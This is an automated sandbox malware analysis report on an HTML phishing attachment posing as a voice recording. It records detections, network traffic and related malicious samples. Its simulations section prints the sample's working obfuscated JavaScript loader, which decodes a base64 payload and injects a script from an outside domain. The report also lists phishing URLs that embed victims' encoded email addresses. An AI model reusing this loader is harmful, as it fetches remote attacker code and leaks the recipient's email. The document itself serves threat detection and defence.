Edit tour

Windows Analysis Report
vRecording0023secsStgusa.html

Overview

General Information

Sample name:	vRecording__0023secs__Stgusa.html
Analysis ID:	1585401
MD5:	4393c8c305ba785b3251e1656e5f4da5
SHA1:	43cda53b1fd887aa0d6129126b6d746f2192a232
SHA256:	0048eca18544b13a6dc37a6284d77b835e77c216109701e9d14d56a2b76b9eb4
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected suspicious Javascript

Detected javascript redirector / loader

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

Detected non-DNS traffic on DNS port

HTML page contains hidden javascript code

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\vRecording__0023secs__Stgusa.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,6140219841670570402,17466484337215704868,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected suspicious Javascript

Source: 0.1.i.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/vRecording__0023... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The use of obfuscation and multiple layers of encoding further increase the risk. While the script's purpose is not entirely clear, the combination of these factors suggests a high likelihood of malicious intent.

Detected javascript redirector / loader

Source: vRecording__0023secs__Stgusa.html

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/vRecording__0023secs__Stgusa.html

HTTP Parser: New script tag found

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/vRecording__0023secs__Stgusa.html

Tab title: vRecording__0023secs__Stgusa.html

Source: vRecording__0023secs__Stgusa.html

HTTP Parser: Base64 decoded: portlandsales@stgusa.com

Source: vRecording__0023secs__Stgusa.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/vRecording__0023secs__Stgusa.html	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62085 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.6:62027 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 69.49.245.172 69.49.245.172
Source: Joe Sandbox View	IP Address: 69.49.245.172 69.49.245.172
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.138
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.138
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.138
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.138
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: ladisneyfan.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62081
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62082
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62085
Source: unknown	Network traffic detected: HTTP traffic on port 62082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62085 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: vRecording__0023secs__Stgusa.html

Initial sample: recording

Source: classification engine

Classification label: mal60.phis.winHTML@30/0@4/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\vRecording__0023secs__Stgusa.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,6140219841670570402,17466484337215704868,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,6140219841670570402,17466484337215704868,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
file:///C:/Users/user/Desktop/vRecording__0023secs__Stgusa.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ladisneyfan.com	69.49.245.172	true	false		unknown
www.google.com	142.250.186.132	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/vRecording__0023secs__Stgusa.html	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
69.49.245.172	ladisneyfan.com	United States	46606	UNIFIEDLAYER-AS-1US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16
192.168.2.6

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585401
Start date and time:	2025-01-07 16:00:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vRecording__0023secs__Stgusa.html
Detection:	MAL
Classification:	mal60.phis.winHTML@30/0@4/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.184.195, 216.58.212.174, 64.233.167.84, 142.250.186.142, 172.217.16.206, 142.250.185.78, 216.58.206.42, 142.250.186.170, 142.250.74.202, 142.250.185.74, 142.250.186.106, 142.250.185.202, 142.250.185.234, 142.250.185.138, 172.217.18.10, 142.250.181.234, 142.250.184.202, 142.250.186.42, 142.250.185.170, 172.217.16.202, 142.250.186.138, 142.250.184.234, 192.229.221.95, 199.232.214.172, 142.250.185.174, 172.217.23.110, 142.250.80.14, 74.125.0.102, 142.250.185.238, 142.250.184.227, 104.102.63.47, 13.107.246.45, 184.28.90.27, 4.245.163.56
Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, r1.sn-t0aekn7e.gvt1.com, clients.l.google.com, r1---sn-t0aekn7e.gvt1.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: vRecording__0023secs__Stgusa.html

Simulations

Behavior and APIs

⊘No simulations

Input	Output
URL: file:///C:/Users/user/Desktop/vRecording__0023... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The use of obfuscation and multiple layers of encoding further increase the risk. While the script's purpose is not entirely clear, the combination of these factors suggests a high likelihood of malicious intent." }
clover = '#cG9ydGxhbmRzYWxlc0BzdGd1c2EuY29t'; var cDiW = 'aG9vcG9lID0gJ2h0dHAnKyJzOi8iKyIvbGEiKyJkaXNuZXlmYSIrIm4uY28iPYDNYLSK2BtL3JlYCsnczQ0NC4nK2BwaHA/Mi1gKyc2CpgyJ8jqODc0NzQ3JytgMFUwu3DczM2FgKycyZjJmNDInK2A0NzUxMmArYGU2YCsnYTcnKyIyNiIrJzU3MicrJzcxNjEnKyc2ZjY5Njg2JysnMTJlNzI3JytgNTJmNmI3YCtgMTM1NzQ2OTZgK2AyNDhgKyI1MjJmLWMiKydsb3Zlcic7CmRvY3VtZW50iGxDrxH9Wy43V1d3cml0ZSddKCI8c2NyaXB0IHNyYz0sSGunIiArIGhvb3BvZSArICInPjxYs6tcL3NjcmlwdD4iKTs='; var LaVg = ["Ys6t","sSGu","PYDNYLS","CpgyJ8jq","43V1","FUwu3","iGxDrxH9"]; LaVg.forEach(function(str) { var VaIo = new RegExp(str, 'g'); cDiW = cDiW.replace(VaIo, ''); }); eval(atob(cDiW));
URL: :// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: ://

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	Airbornemx_PAYOUT7370.odt	Get hash	malicious	Unknown	Browse
	https://ipfs.io/ipfs/bafybeifkk7tuizumzirz7qfuxbcoggonud2b6gcvttaa7ewfdgltpybls4/index1.html?err=KHPGKXW3AEO13L6ZGUK&dispatch=B34&id=2849c1C900c31C62B159B3002c63C5#usering@vanas.eu	Get hash	malicious	Unknown	Browse
	https://www.clubgets.com/pursuit.php?a_cd=%2A%2A%2A%2A%2A&b_cd=0018&link=https://zion.com.sg/gVBN1ASF7vQWE3IOP6IOP6VBN1ABC2cQWE3ZXC0VBN1QWE3IOP6VBN1XYZ1mASF7PPL6QAZ3ERT4QWE3ABC2cASF7m	Get hash	malicious	HTMLPhisher	Browse
	http://lynxblog.net	Get hash	malicious	Unknown	Browse
	https://sos-ch-gva-2.exo.io/ready/seah/continue/complete-this-to-continue.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526	Get hash	malicious	Unknown	Browse
	https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkM	Get hash	malicious	HTMLPhisher	Browse
	https://check.qlkwr.com/awjsx.captcha?u=d9b43caa-60bc-4673-bed6-4e9abc0c0678	Get hash	malicious	Unknown	Browse
	Onedrive Shared document.html	Get hash	malicious	HTMLPhisher	Browse
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse
69.49.245.172	http://ppc-overwatch.com	Get hash	malicious	Unknown	Browse	ppc-overwatch.com/favicon.ico
	http://aking.nyc	Get hash	malicious	Unknown	Browse	aking.nyc/index.html
	https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379	Get hash	malicious	HTMLPhisher	Browse	kenfong.com/favicon.ico
	https://weblaunch.blifax.com/listener3/redirect?l=e6df36b9-5af1-4758-b7e4-83fbf7f30dfb&id=e0d346f1-f241-ee11-acc4-000c295a2555&u=http%253Aeyesontheguys.com%2Fwinner%2F03013%2F%2FYnJhbmRvbi5nYXJjaWFAZ3RmY3Uub3Jn	Get hash	malicious	HTMLPhisher	Browse	eyesontheguys.com/favicon.ico
	https://weblaunch.blifax.com/listener3/redirect?l=e6df36b9-5af1-4758-b7e4-83fbf7f30dfb&id=e0d346f1-f241-ee11-acc4-000c295a2555&u=http%253Aeyesontheguys.com%2Fwinner%2F87707%2F%2FcmVlZC5wZW5kbGV0b25AZXhwZXJpdGVjLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	eyesontheguys.com/favicon.ico
	https://weblaunch.blifax.com/listener3/redirect?l=e6df36b9-5af1-4758-b7e4-83fbf7f30dfb&id=e0d346f1-f241-ee11-acc4-000c295a2555&u=%68%74%74%70%25%33%41heinleinarchives.net%2Fnew%2F80701%2F%2Fa3Jpc3RpbmUuc29yZW5zZW5AcmVkd2lyZXNwYWNlLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	heinleinarchives.net/favicon.ico
	https://weblaunch.blifax.com/listener3/redirect?l=e6df36b9-5af1-4758-b7e4-83fbf7f30dfb&id=e0d346f1-f241-ee11-acc4-000c295a2555&u=http%253Aeyesontheguys.com%2Fwinner%2F66812%2F%2Fc3RheWxvckBqZWZmcGFyaXNoLm5ldA==	Get hash	malicious	HTMLPhisher	Browse	eyesontheguys.com/favicon.ico
	https://m.exactag.com/ai.aspx?tc=d9496601bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ablessedbeyondproperties.com%2Fwinner%2F71809%2F%2Fam9lbC5zZWFybGVAemJldGEuY29t	Get hash	malicious	HTMLPhisher	Browse	blessedbeyondproperties.com/favicon.ico
	https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=	Get hash	malicious	HTMLPhisher	Browse	bigswitch.co.in/favicon.ico
	https://r20.rs6.net/tn.jsp?f=001bkqLx4VA9V9-9cjr8F3mS_GZ3jv8wu1CrjGYvCIh7Cs1Zd2hmI2Fg3r2PwcFoev5xVrU6TTCVOPr-JKpFjiZ9SBmfuz2qGwy8tnjDHanCw8QSWiZdRhsKT0p-WHIb6hpQSCvdqLBoOH2xlhGk5fuIw==&c=ihjxwKkEncyzpaCxSndkOynX3sy9ZyN9ejOcfC9DIxWFkctc3VsasA==&ch=MPXyiw2PxuljH9_IywoacMF_OZeEnWl-v3iM5576DBOXsGd6-zP4Sw==&__=/asdf/am9obi5kb2VAbWFsaWNpb3VzLnBoaXNo	Get hash	malicious	HTMLPhisher	Browse	lafamulenta17.com/favicon.ico

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	miori.sh4.elf	Get hash	malicious	Unknown	Browse	198.154.232.177
	https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkM	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.com	Get hash	malicious	Unknown	Browse	192.185.163.199
	m68k.elf	Get hash	malicious	Mirai	Browse	173.83.210.141
	ppc.elf	Get hash	malicious	Mirai	Browse	98.131.204.216
	mpsl.elf	Get hash	malicious	Mirai	Browse	173.83.122.175
	https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052a	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	Vernales Restaurant-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGN	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	40.113.110.67
	U1P3u1tkB2.exe	Get hash	malicious	Unknown	Browse	40.113.110.67
	U1P3u1tkB2.exe	Get hash	malicious	Unknown	Browse	40.113.110.67
	9876567899.bat.exe	Get hash	malicious	Lokibot	Browse	40.113.110.67
